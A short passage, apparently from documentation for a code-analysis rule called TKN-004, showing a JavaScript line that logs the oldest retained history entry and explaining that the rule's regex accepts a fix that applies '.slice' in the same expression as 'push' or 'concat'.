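console.log(history[0].step); // 30 — oldest retained entry
```

Because the detection regex only suppresses TKN-004 when `.slice` appears after the `push`/`concat`, a fix written this way (slice applied in the same expression) also passes the detector.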
